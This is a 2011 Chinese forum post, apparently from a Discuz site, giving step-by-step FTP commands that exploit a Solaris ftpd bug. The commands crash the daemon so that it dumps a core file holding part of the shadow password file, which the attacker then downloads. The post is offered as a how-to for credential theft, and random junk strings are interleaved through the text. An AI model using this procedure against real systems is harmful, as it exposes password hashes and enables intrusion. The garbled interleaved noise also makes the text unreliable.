天天爱天天做天天做天天吃中文|久久综合给久合久久综合|亚洲视频一区二区三区|亚洲国产综合精品2022

  • 
    
    <delect id="ixd07"></delect>

      汶上信息港

      標(biāo)題: 如何用FIP獲取shadow口令文件 [打印本頁(yè)]

      作者: 雜七雜八    時(shí)間: 2011-1-12 21:01
      標(biāo)題: 如何用FIP獲取shadow口令文件
      該方法利用了Solaris 操作系統(tǒng)中FTPD的一個(gè)BUG,使得用戶可以獲得該機(jī)的口令文件。具體過(guò)程如下:
      ! Q6 x5 A# ^' `3 B9 G
      % ~) R. b& ~  W$ Y5 H( U1.通過(guò) ftp 正常登錄到目的主機(jī)上, h5 m6 S' j% a6 _" @; z
      8 R; J. Y3 A. O' e
      2.輸入如下命令序列:
      : s5 o5 `- [# Z  ^8 F
      2 h+ P, {/ D6 y% I/ pftp> user root wrongpasswd! Y: G# W9 w/ L* g* G" e

      . r/ L0 O! @: Z5 C6 L+ Aftp> quote pasv
      - ]' e; m/ |0 l" q  q6 a  F4 w+ r
      - v- B1 o7 G* K+ w+ y/ ~3.這時(shí),ftpd會(huì)報(bào)錯(cuò)退出,同時(shí)會(huì)在當(dāng)前目錄下生成一個(gè)core,口令文件就包含在這個(gè)core中。
      ! u7 l9 W% H2 V) ^1 p$ X5 {: H5 S  H/ F) ^
      4.再次進(jìn)入FTP >get core
      $ Z; [8 M0 W! P: I# t2 @8 [( w: v0 i! B
      補(bǔ)充:雖然在core只有一部分shadow,但是對(duì)于系統(tǒng)來(lái)說(shuō)已經(jīng)是致命的打擊了
      ! j; j; z' P+ {. n
      8 h" l4 M& [3 E+ d8 L. h  e  j+ c




      歡迎光臨 汶上信息港 (http://www.vancelump.com/) Powered by Discuz! X3.5